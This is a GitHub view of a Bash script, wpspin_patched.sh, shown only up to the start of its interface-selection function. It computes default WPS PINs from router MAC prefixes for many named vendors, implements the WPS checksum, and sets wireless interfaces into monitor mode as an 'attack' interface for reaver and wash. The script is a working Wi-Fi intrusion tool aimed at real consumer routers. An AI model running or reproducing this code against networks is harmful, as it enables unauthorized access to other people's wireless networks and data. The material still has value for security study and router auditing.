-
Notifications
You must be signed in to change notification settings - Fork 173
/
Copy pathwpspin_patched.sh
executable file
·2395 lines (1667 loc) · 94.4 KB
/
wpspin_patched.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#!/bin/bash
# This scripts is edited under the General Public License as defined by the Free software foundation.
# This package is distributed in the hope that it will be useful, but without any warranty; It can be used and modified and shared but should be referenced to, it CANNOT be
# sold or be used for a commercial-economical purpose.
# See the details in the file LICENCE.txt that is situated in the folder of the script or visit http://gplv3.fsf.org/ )
# The discovery of One algorithm used in WPSPIN have been made parallely and previously by zhaochunsheng in a C. script named computepinC83A35. as i don't known C or
# programming and found this out after coding the first version of WPS, this bash script doesn't use a dingle line of computepinC83A35.
# But it had to be saved that zhaochunsheng found the main algorithm on Chinese access points months before I found it on a new Belkin N router, without knowing it works.
# The page of the author is sadly down and i cannot link you to a straight source
# This code wouldn't have been possible with the help and advices of antares_145, r00tnuLL and 1camaron1, thanks to them billion a billion time :)
# It wouldn't have been possible neither without my beloved lampiweb.com work crew, maripuri, bentosouto, dirneet, betis-jesus, compota, errboricobueno, pinty_102 nad all users
# greetings to crack-wifi.com familly, yasmine, M1ck3y, spawn, goliate, fuji, antares has been already credited, koala, noireaude, vances1, konik etc... and all users
# greetings to auditoriaswireless.net and thanks to the big chief papones for the hosting and greetings to everybody
# This code uses wps reaver that has to be installed on it own, reaver is a free software (http://code.google.com/p/reaver-wps/) (GPL2) by Tactical Network Solutions. Thanks to
# them for this amazing work
# You also need aircrack-ng, thanks to Mister X and kevin devine for providing the best suite ever (http://www.aircrack-ng.org/)
# I would like also to thanks Stefan Viehbock for all is amazing work on wps (http://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/)
# 1.1 (10-12-2012)
# - Support for PIN beginning with one or several 0 thanks to the data of atim and tresal.
# - New MAC supported : 6A:C0:6F (HG566 default ESSID vodafoneXXXX )
# 1.2 (12/12/2012)
# - Fixed output bugs in backtrack and other distributions
# - Added support to the generic default PIN known
# 1.3 (23/01/2013)
# - New supported devices:
# - 7 bSSID vodafoneXXXX (HG566a) > 6A:3D:FF / 6A:A8:E4 / 6A:C0:6F / 6A:D1:67 / 72:A8:E4 / 72:3D:FF / 72:53:D4
# - 2 bSSID WLAN_XXXX (PDG-A4001N de adbroadband) > 74:88:8B / A4:52:6F
# - 2 new models affected:
# 1) SWL (Samsung Wireless Link), default ESSID SEC_ LinkShare_XXXXXX. 2 known affected BSSID > 80:1F:02 / E4:7C:F9
# 2) Conceptronic c300brs4a (default ESSID C300BRS4A ) 1 BSSID known > 00:22:F7
# - Rules to check the validity of the mac address (thanks r00tnuLL and anteres_145 for your codes)
# - More filter for some case where several default ssid are possible,check the difference between ssid and bssid for FTE for possibles mismatch...
# - More information displayed when a target is selected
# - Display and colours problems are definitively solved for all distributions, one version
# - Rewriting of code (tanks to r00tnuLL, antares_145, goyfilms and 1camron1 for their advices and feed back)
# 1.4 ( 22/05/2013)
# - Complete Rewriting of code to provide new functions:
# - Multi language
# - A automated mode using wash and reaver
# - Interfaces management (automatic if only one interface is present, acting as filter if no mode monitor is possible to reduce options)
# - New supported bssid
# - 2 news bssid for FTE-XXXX (HG532c) 34:6B:D3 and F8:3D:FF
# - 16 new bssid for vodafone HG566a
# 62:23:3D 62:3C:E4 62:3D:FF 62:55:9C 62:7D:5E 62:B6:86 62:C7:14 6A:23:3D 6A:3D:FF 6A:7D:5E 6A:C6:1F 6A:D1:5E 72:53:D4 72:55:9C 72:6B:D3 72:A8:E4
# - New supported devices ( 9 models )
# - TP-LINK > TD-W8961ND v2.1 default SSID TP-LINK_XXXXXX 3 known bssids ; F8:D1:11 B0:48:7A 64:70:02
# - EDIMAX > 3G-6200n and EDIMAX > 3G-6210n bssid ; 00:1F:1F defaukt SSID : default
# - KOZUMI > K1500 and K1550 bssid : 00:26:CE
# - Zyxel > P-870HNU-51B bssid : FC:F5:28
# - TP-LINK TP-LINK_XXXXXX TL-WA7510N bssid : 90:F6:52:
# - SAGEM FAST 1704 > SAGEM_XXXX bssid : 7C:D3:4C:
##################################### COLORS
colorbase="\E[0m" # We define the colors as variables to avoid problems of output from one distribution to the other
azulfluo="\033[1;36m"
amarillo="\033[1;33m"
rojo="\033[1;31m"
blanco="\033[1;37m"
verde="\033[0;32m"
orange="\033[0;33m"
azul="\033[0;34m"
magenta="\033[1;35m"
negro="\033[0;30m"
gris="\033[1;30m"
verdefluo="\033[1;32m"
clignote='\e[1;5m'
############################### FUNCTIONS ###########################################################################################
############################### FIRST THE ONE THAT ARE COMMON TO EVERY LANGUAGE (NO DISPLAY INVOLVED) ##################################################
############################## I > GENERATE - TO ATTRIBUTE PIN AND DATAS TO AP
############################### II > CHECKSUM (by antares_145 ) - CALCULATE THE WPS CHECKSUM
############################### III > ZAOMODE - APLLYING THE SAME ALGORITHM THAN ZHAOCHUNSHENG IN COMPUTEPIN
############################### IV > IFACE - MANAGE INTERFACES FOR WIRELESS INTRUSION AND LIMIT USER TO SHORT MENUE IF NO INTERFACE IS AVAILABLE
############################### V > IFACE_SELECTION - FOR SELECTING THE INTERFACE IF SEVERAL ARE AVALAIBLES
############################### VI > WASH_SCAN - LAUNCH WPS SCANNING REORGANIZING THE OUPUT DISPLY (use wash form reaver)
############################### VII > REAVER_CHECK - CONTROL IF REAVER IS INSTALLED (ALSO CHECK IF WASH OR WALSH IS USED)
############################### VIII > BIG_MENUE - WPSPIN WITH ALL FEATURES
############################### IX > CLEAN - REMOVE TMP FILES AND UNSET THE VARIABLES
################### GENERATE ######################################################################################################################################
################################################## the core of script, attribute a default PIN to the routers
###### VARIABLES CODIFIED ACTIVATED > 1 = YES 0 = NO SPECIAL > 1 = SEVERAL MODEL WITH THIS BSSID 2 = WPS AP RATE LIMIT ############################
############################### UNKNOWN > 0 = NO 1 = YES
GENERATE(){ # this functions will attribute a default PIN number according to the bssid and in some cases bssid
# and essid, we need at least to have defined a variable BSSID (the mac address of the objective
UNKNOWN=0 # By default routers are marked as supported with 0, when there are not this value will be changed
SPECIAL=0
CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':') # we take pout the 6 first half of the mac address (to identify the devices=
#echo $CHECKBSSID
FINBSSID=$(echo $BSSID | cut -d ':' -f4,5,6) # we keep the other half to generate the PIN
MAC=$(echo $FINBSSID | tr -d ':') # taking away the ":"
CONVERTEDMAC=$(printf '%d\n' 0x$MAC) # conversion to decimal
case $CHECKBSSID in # we will check the beginning of the mac to identify the AP
04C06F | 202BC1 | 285FDB | 346BD3 | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0 | F83DFF) # For FTE-XXXX (HG552c), original algorithm by kcdtv
FINESSID=$(echo $ESSID | cut -d '-' -f2) # We take the identifier of the essid with cut
PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':') # we take digit 7 and 8 of the mac address
CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':') # we isolate the digits 9 to 12 to check the conformity of the default difference BSSID - ESSID
if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] && [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];
then
MACESSID=$(echo $PAREMAC$FINESSID) # this is the string used 7 and 8 digits mac + 4 last digits essid FTE-XXXX
STRING=`expr $(printf '%d\n' 0x$MACESSID) '+' 7` # we had 7 to the string
CHECKSUM
else # if essid is not the default one we will generate the three possible PIN according to the mac
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')' '+' 8` # mac + 8 converted to decimal = our PIN2
CHECKSUM
PIN2=$PIN
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')' '+' 14` # mac + 14 converted to decimal = our PIN3
CHECKSUM
PIN3=$PIN
ZAOMODE # PIN number one we use the first algorithm, end mac converted to decimal
CHECKSUM
fi
FABRICANTE="HUAWEI" ##### FTE-XXXX HUAWEI HG532c Echo Life > algorithm kcdtv
DEFAULTSSID="FTE-XXXX"
MODEL="HG532c Echo Life"
ACTIVATED=1
;;
001915 ) ##### WLAN-XXXX TECOM AW4062 > generic 12345670
PIN=12345670
FABRICANTE="OBSERVA TELECOM"
DEFAULTSSID="WLAN_XXXX"
MODEL="AW4062"
ACTIVATED=0 # 0 is given to the routers that does not't have WPS enabled
;;
F43E61 | 001FA4) ####### WLAN_XXXX OEM Shenzhen Gongjin Electronics Encore ENDSL-4R5G > Generic 12345670
PIN=12345670
FABRICANTE="OEM Shenzhen Gongjin Electronics"
DEFAULTSSID="WLAN_XXXX"
MODEL="Encore ENDSL-4R5G"
ACTIVATED=1 # 1 and the wps is activated
;;
404A03) ######## WLAN_XXXX P-870HW-51A V2 ZYXELL > Generic 11866428
PIN=11866428
FABRICANTE="ZYXELL"
DEFAULTSSID="WLAN_XXXX"
MODEL="P-870HW-51A V2"
ACTIVATED=1
;;
001A2B) ######## WLAN_XXXX Gigabyte 802.11n by Comtrend >Generic 88478760
PIN=88478760 # comtrend has others models with this mac for the moment we will give this PIN for all devices warning the user about it
FABRICANTE="Comtrend"
DEFAULTSSID="WLAN_XXXX"
MODEL="Gigabit 802.11n"
ACTIVATED=1
SPECIAL=2 # 2 when different models with different PIN have the same start of bssid
;;
3872C0) # ######## JAZZTEL_XXXX AR-5387un Comtrend > Generic 18836486 20172527
PIN=18836486 # same story, some of this range mac address are used by Telefonica (WLAN_XXXX) in this case there is not even wps, we let it this way
PIN2=20172527
FABRICANTE="Comtrend"
DEFAULTSSID="JAZZTEL_XXXX"
MODEL="AR-5387un"
ACTIVATED=0
SPECIAL=2
;;
FCF528) ######### WLAN_XXXX P-870HNU-51B by ZYXELL > Generic 20329761
PIN=20329761
FABRICANTE="ZYXELL"
DEFAULTSSID="WLAN_XXXX"
MODEL="P-870HNU-51B"
ACTIVATED=1
SPECIAL=1
;;
3039F2) ############# PIN WLAN_XXXX PDG-A4001N by ADB-Broadband > multiples generic PIN
PIN=16538061
PIN2=16702738
PIN3=18355604
PIN4=88202907
PIN5=73767053
PIN6=43297917
PIN7=19756967
PIN8=13409708
FABRICANTE="ADB-Broadband"
DEFAULTSSID="WLAN_XXXX"
MODEL="PDG-A4001N"
ACTIVATED=1
;;
74888B) ############# PIN WLAN_XXXX PDG-A4001N by ADB-Broadband > multiples generic PIN
PIN=43297917
PIN2=73767053
PIN3=88202907
PIN4=16538061
PIN5=16702738
PIN6=18355604
PIN7=19756967
PIN8=13409708
FABRICANTE="ADB-Broadband"
DEFAULTSSID="WLAN_XXXX"
MODEL="PDG-A4001N"
ACTIVATED=1
;;
A4526F) ############# PIN WLAN_XXXX PDG-A4001N by ADB-Broadband > multiples generic PIN
PIN=16538061
PIN2=88202907
PIN3=73767053
PIN4=16702738
PIN5=43297917
PIN6=18355604
PIN7=19756967
PIN8=13409708
FABRICANTE="ADB-Broadband"
DEFAULTSSID="WLAN_XXXX"
MODEL="PDG-A4001N"
ACTIVATED=1
;;
DC0B1A) ############# PIN WLAN_XXXX PDG-A4001N by ADB-Broadband > multiples generic PIN
PIN=16538061
PIN2=16702738
PIN3=18355604
PIN4=88202907
PIN5=73767053
PIN6=43297917
PIN7=19756967
PIN8=13409708
FABRICANTE="ADB-Broadband"
DEFAULTSSID="WLAN_XXXX"
MODEL="PDG-A4001N"
ACTIVATED=1
;;
5C4CA9 | 62233D | 623CE4 | 623DFF | 62559C | 627D5E | 62A8E4 | 62B686 | 62C06F | 62C61F | 62C714 | 62E87B | 6A233D | 6A3DFF | 6A53D4 | 6A559C | 6A6BD3 | 6A7D5E | 6AA8E4 | 6AC06F | 6AC61F | 6AC714 | 6AD15E | 6AD167 | 723DFF | 7253D4 | 72559C | 726BD3 | 727D5E | 72A8E4 | 72C06F | 72C714 | 72D15E | 72E87B )
ZAOMODE
CHECKSUM
FABRICANTE="HUAWEI" ############# HUAWEI HG 566a vodafoneXXXX > Pin algo zao
DEFAULTSSID="vodafoneXXXX"
MODEL="HG 566a"
ACTIVATED=1
;;
002275)
ZAOMODE
CHECKSUM
FABRICANTE="Belkin" ############# Belkin Belkin_N+_XXXXXX F5D8235-4 v 1000 > Pin algo zao
DEFAULTSSID="Belkin_N+_XXXXXX"
MODEL="F5D8235-4 v 1000"
ACTIVATED=1
;;
08863B)
ZAOMODE
CHECKSUM
FABRICANTE="Belkin" ############# Belkin belkin. F5D8235-4 v 1000 > Pin algo zao
DEFAULTSSID="belkin.XXX"
MODEL="F9K1104(N900 DB Wireless N+ Router)"
ACTIVATED=1
;;
001CDF)
ZAOMODE
CHECKSUM
FABRICANTE="Belkin" ############# Belkin belkin. F5D8235-4 v 1000 > Pin algo zao
DEFAULTSSID="belkin.XXX"
MODEL="F5D8235-4 v 1000"
ACTIVATED=1
;;
00A026)
ZAOMODE
CHECKSUM
FABRICANTE="Teldat" ############# Teldat WLAN_XXXX iRouter1104-W > Pin algo zao
DEFAULTSSID="WLAN_XXXX"
MODEL="iRouter1104-W"
ACTIVATED=1
;;
5057F0)
ZAOMODE
CHECKSUM
FABRICANTE="Zyxel" ############# Zyxel ZyXEL zyxel NBG-419n > Pin algo zao
DEFAULTSSID="ZyXEL"
MODEL="zyxel NBG-419n"
ACTIVATED=1
;;
C83A35 | 00B00C | 081075)
ZAOMODE
CHECKSUM
FABRICANTE="Tenda" ############# Tenda W309R > Pin algo zao, original router that was used by ZaoChuseng to reveal the security breach
DEFAULTSSID="cf. computepinC83A35"
MODEL="W309R"
ACTIVATED=1
;;
E47CF9 | 801F02)
ZAOMODE
CHECKSUM
FABRICANTE="SAMSUNG" ############# SAMSUNG SEC_ LinkShare_XXXXXX SWL (Samsung Wireless Link) > Pin algo zao
DEFAULTSSID="SEC_ LinkShare_XXXXXX"
MODEL="SWL (Samsung Wireless Link)"
ACTIVATED=1
;;
0022F7)
ZAOMODE
CHECKSUM
FABRICANTE="Conceptronic" ############# CONCEPTRONIC C300BRS4A c300brs4a > Pin algo zao
DEFAULTSSID="C300BRS4A"
MODEL="c300brs4a"
ACTIVATED=1
;; ########### NEW DEVICES SUPPORTED FOR VERSION 1.5 XD
F8D111 | B0487A | 647002 )
ZAOMODE
CHECKSUM
FABRICANTE="TP-LINK" ######## TP-LINK_XXXXXX TP-LINK TD-W8961ND v2.1 > Pin algo zao
DEFAULTSSID="TP-LINK_XXXXXX"
MODEL="TD-W8961ND v2.1"
ACTIVATED=1
SPECIAL=2
;;
001F1F)
ZAOMODE
CHECKSUM
FABRICANTE="EDIMAX" ########## EDIMAX 3G-6200n "Default" > PIN ZAO
DEFAULTSSID="Default"
MODEL="3G-6200n"
ACTIVATED=1
;;
001F1F)
ZAOMODE
CHECKSUM
FABRICANTE="EDIMAX" ########## EDIMAX 3G-6200n/3G-6210n "Default" > PIN ZAO
DEFAULTSSID="Default"
MODEL="3G-6200n & 3G-6210n"
ACTIVATED=1
;;
0026CE)
ZAOMODE
CHECKSUM
FABRICANTE="KUZOMI" ########## KUZOMI K1500 & K1550 "Default" > PIN ZAO
DEFAULTSSID="Default"
MODEL="K1500 & K1550"
ACTIVATED=1
;;
90F652)
PIN=12345670
FABRICANTE="TP-LINK" ########## TP-LINK TP-LINK_XXXXXX TL-WA7510N > PIN generic 12345670
DEFAULTSSID="TP-LINK_XXXXXX"
MODEL="TL-WA7510N"
ACTIVATED=1
;;
7CD34C) ########### SAGEM FAST 1704 > PIN GENERIC 43944552
PIN=43944552
FABRICANTE="SAGEM"
DEFAULTSSID="SAGEM_XXXX"
MODEL="fast 1704"
ACTIVATED=1
;;
000CC3) ########### BEWAN, two defaukt ssid abd two default PIN ELE2BOX_XXXX > 47392717 Darty box ; 12345670
if [[ $ESSID =~ ^TELE2BOX_[[:xdigit:]]{4}[[:blank:]]*$ ]]; then
FABRICANTE="BEWAN"
DEFAULTSSID="TELE2BOX_XXXX"
MODEL="Bewan iBox V1.0"
ACTIVATED=1
SPECIAL=2
PIN=47392717
elif [[ $ESSID =~ ^DartyBox_[[:xdigit:]]{3}_[[:xdigit:]]{1}*$ ]]; then
FABRICANTE="BEWAN"
DEFAULTSSID="DartyBox_XXX_X"
MODEL="Bewan iBox V1.0"
ACTIVATED=1
PIN=12345670
else
FABRICANTE="BEWAN"
DEFAULTSSID="TELE2BOX_XXXX / DartyBox_XXX_X"
MODEL="Bewan iBox V1.0"
ACTIVATED=1
SPECIAL=2
PIN=47392717
PIN2=12345670
fi
;;
*) # for everything alese, the first algorythm by zhaochunsheng
if [[ $ESSID =~ ^DartyBox_[[:xdigit:]]{3}_[[:xdigit:]]{1}*$ ]]; then # case of the darty box that can broadcast bssid without any relation to the device real mac
FABRICANTE="BEWAN"
DEFAULTSSID="DartyBox_XXX_X"
MODEL="Bewan iBox V1.0"
ACTIVATED=1
PIN=12345670
else
ZAOMODE
CHECKSUM
UNKNOWN=1 # this value 1 will identify the routeurs has unknown
fi
;;
esac
}
################################################################################################ END GENERATE ################ FOR attributing the default PIN #################
#####################################################################################################
CHECKSUM(){ # The function checksum was written for bash by antres_145 form crack-wifi.com
PIN=`expr 10 '*' $STRING` # We will have to define first the string $STRING (the 7 first number of the WPS PIN)
ACCUM=0 # to get a result using this function)
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # multiplying the first number by 3, the second by 1, the third by 3 etc....
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # so we follow the pattern for our seven number
DIGIT=`expr $ACCUM '%' 10` # we define our digit control: the sum reduced with base 10 to the unit number
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the cheksum is equal to " 10 minus digit control "
PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-pading in case that the value of the PIN is under 10000000
} # STRING + CHECKSUM gives the fulll WPS PIN
ZAOMODE(){ # this is the string (half mac converted to decimal) used in the algorithm originally discovered by
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'` # zhaochunsheng in ComputePIN
}
IFACE(){ # For reaver and wash/wealsh we will need a mode monitor interface so this functions will deal
#with the task to assign one, that will be declared as MON_ATTACK
# this function will check if there is any wireless device recognized by he system
iw dev | grep Interface > /tmp/Interface.txt # if there is not, the user will be directed to short menu where no scan or wireless attack
declare -a INTERFACE # ar allowed So we grep the information of iw dev in a text file
declare -a WLANX # declare 3 arrays, one for the total interfaces, one for the wlan and the other for mon
declare -a MONX
for i in 'INTERFACE' 'WLANX' 'MONX' ;
do
count=1
if [ "$i" == "INTERFACE" ]; then
while read -r line; do # read line by line the output
INTERFACE[${count}]="$line"
count=$((count+1)) # counting lines form one to one
done < <( cat /tmp/Interface.txt | awk -F' ' '{ print $2 }') # we grap the second field with awk to fill the array for total interface
elif [ "$i" == "WLANX" ]; then # the the same but with "grep" wlan to select the moda managed interfaces
while read -r line; do
WLANX[${count}]="$line"
count=$((count+1))
done < <( cat /tmp/Interface.txt | awk -F' ' '{ print $2 }' | grep wlan )
elif [ "$i" == "MONX" ]; then # The same with the mon interfaces
while read -r line; do
MONX[${count}]="$line"
count=$((count+1))
done < <( cat /tmp/Interface.txt | awk -F' ' '{ print $2 }' | grep mon )
fi
done
rm /tmp/Interface.txt &> /dev/null # we erase the temporary text
IW_INTERFACE=$(echo ${#INTERFACE[@]}) # this is just to make a basic control of chipset and interface
IW_WLANX=$(echo ${#WLANX[@]})
IW_MONX=$(echo ${#MONX[@]})
if [ "$IW_INTERFACE" == 0 ]; then # if no wireless device is detected, the script will be limited to a "Short menue" where
SORTMENUE_WARNING="$NO_MONITOR_MODE" # no scan or attack
SHORTMENUE ############################################################ to be redacted according to the language ######################################################
fi
sudo airmon-ng | sed '1,4d' | sed '$d' > /tmp/airmon.txt # with sed and airmon-ng we take out the interesting information of airmon-ng command
declare -a MON_INTERFACE # one array for the chipset and one array for the interface
declare -a MON_CHIPSET
for i in 'MON_INTERFACE' 'MON_CHIPSET'; # we links the values of te arrays with i
do
count=1 # we start from one
if [ "$i" == "MON_INTERFACE" ]; then # we start with the array for the mode monitor capable interfaces
while read -r line; do # we read the ouput of airmon-ng line by line and give a value to each line
MON_INTERFACE[${count}]="$line" # a value to each line
count=$((count+1)) # and count one by one
done < <( cat /tmp/airmon.txt | awk -F' ' '{ print $1 }') # we take the first field that is wlanX or monX in airmon-ng display
elif [ "$i" == "MON_CHIPSET" ]; then # The same for the chipset of the interface
while read -r line; do
MON_CHIPSET[${count}]="$line"
count=$((count+1))
done < <( cat /tmp/airmon.txt | awk -F' ' '{ print $2 $3 }' )
fi
done
rm /tmp/airmon.txt &> /dev/null
AIRMON_INTERFACE=$(echo ${#MON_INTERFACE[@]})
AIRMON_CHIPSET=$(echo ${#MON_CHIPSET[@]})
BAD_CHIPSET=$( echo "${MON_CHIPSET[1]}" | grep Unknown)
if [ "$AIRMON_INTERFACE" == 0 ]; then #if no mode monitor interface is detected we will remain in short menu )no wash and no reaver)
SORTMENUE_WARNING="$NO_MONITOR_MODE"
SHORTMENUE ###################################### change according to selected language################################
elif [ "$IW_WLANX" == 1 ] && [ -n "${BAD_CHIPSET}" ] ; then # if the only chipset is unknown by airmon-ng
echo "$MON_ADVERTENCIA" ################ defined according to language ###########################
sleep 8
sudo ifconfig $(echo "${MON_INTERFACE[1]}") down
MON_ATTACK=$( sudo airmon-ng start $(echo "${MON_INTERFACE[1]}") | grep enabled | awk -F' ' '{ print $5 }' | sed -e 's/)//g' ) # we activate mode monitor
sudo ifconfig $(echo "${MON_INTERFACE[1]}") down
fi
if [ "$AIRMON_INTERFACE" == 1 ] && [ "$IW_INTERFACE" == 1 ] ; then # if there is just one interface and no mode monitor interface, this single interface
sudo ifconfig $(echo "${MON_INTERFACE[1]}") down
MON_ATTACK=$( sudo airmon-ng start $(echo "${MON_INTERFACE[1]}") | grep enabled | awk -F' ' '{ print $5 }' | sed -e 's/)//g' ) # we activate mode monitor automatically
RT_CHECK=$( echo "${MON_CHIPSET[1]}" | grep RalinkRT2870) # filter for rt3070 that associate better if wlan is up
if [ -n "${RT_CHECK}" ]; then
sudo ifconfig $(echo "${WLANX[1]}") up
else
sudo ifconfig $(echo "${WLANX[1]}") down
fi
elif [ "$AIRMON_INTERFACE" == 2 ] && [ "$IW_INTERFACE" == 2 ] && [ "$IW_MONX" == 1 ] ; then # if there is one wlan and one mon the mon will be automatically selected
MON_ATTACK=$(echo "${MONX[1]}")
RT_CHECK=$( echo "${MON_CHIPSET[1]}" | grep RalinkRT2870) # filter for rt3070 that associate better if wlan is up
if [ -n "${RT_CHECK}" ]; then
sudo ifconfig $(echo "${WLANX[1]}") up
else
sudo ifconfig $(echo "${WLANX[1]}") down
fi
fi
if [ "$MON_ATTACK" == "" ] && [ "$IW_MONX" == 0 ]; then # If there is no interface in monitor mode detected
while [ "$MON_ATTACK" == "" ]; do # Until an interface hasn't been properly chosen
echo "$INTERFACEDESIGN" ########################## modified according to the selected language #################
for i in ${!MON_INTERFACE[*]}; do # the user will be prompt to choose between interfaces with mode monitor compatibility
CHIPSET_REDLIST=$(echo ${MON_CHIPSET[${i}]} | grep Unknown )
if [ -n "${CHIPSET_REDLIST}" ]; then
CHIPSET_DISPLAY=$( echo -e "$rojo${MON_CHIPSET[${i}]})$colorbase")
else
CHIPSET_DISPLAY=$( echo "${MON_CHIPSET[${i}]}" )
fi
CHECK_MON_INTERFACE=$(echo ${MON_INTERFACE[${i}]})
if [ "$CHECK_MON_INTERFACE" = "wlan0" ] || [ "$CHECK_MON_INTERFACE" = "wlan1" ] || [ "$CHECK_MON_INTERFACE" = "wlan2" ] || [ "$CHECK_MON_INTERFACE" = "wlan3" ]|| [ "$CHECK_MON_INTERFACE" = "wlan4" ]|| [ "$CHECK_MON_INTERFACE" = "wlan5" ]|| [ "$CHECK_MON_INTERFACE" = "wlan6" ]|| [ "$CHECK_MON_INTERFACE" = "wlan7" ]|| [ "$CHECK_MON_INTERFACE" = "wlan8" ]|| [ "$CHECK_MON_INTERFACE" = "wlan9" ]; then
echo -e " $amarillo$i$blanco ${MON_INTERFACE[${i}]} $CHIPSET_DISPLAY $colorbase" # displayed with this for loop
else
echo -e " $amarillo$i$blanco ${MON_INTERFACE[${i}]} $CHIPSET_DISPLAY $colorbase"
fi
done
echo ""
echo -e " $colorbase ---------------------------------------------------"
echo ""
SELECT_THEIFACE ############################ modified according to the languge ###########################
sudo ifconfig $(echo ${MON_INTERFACE[${i}]}) down # We bring down the interface
MON_ATTACK=$( sudo airmon-ng start $(echo ${MON_INTERFACE[${i}]}) | grep enabled | awk -F' ' '{ print $5 }' | sed -e 's/)//g' ) # We start modemonitor
RT_CHECK=$(echo ${MON_CHIPSET[${i}]} | grep RalinkRT2870 ) # filter for rt3070 that associate better if wlan is up
if [ -n "${RT_CHECK}" ]; then
sudo ifconfig $(echo ${MON_INTERFACE[${i}]}) up
else
sudo ifconfig $(echo ${MON_INTERFACE[${i}]}) down
fi
done
fi
IFACE_SELECTION(){ ################################ IFACE SELECTION ##################################################
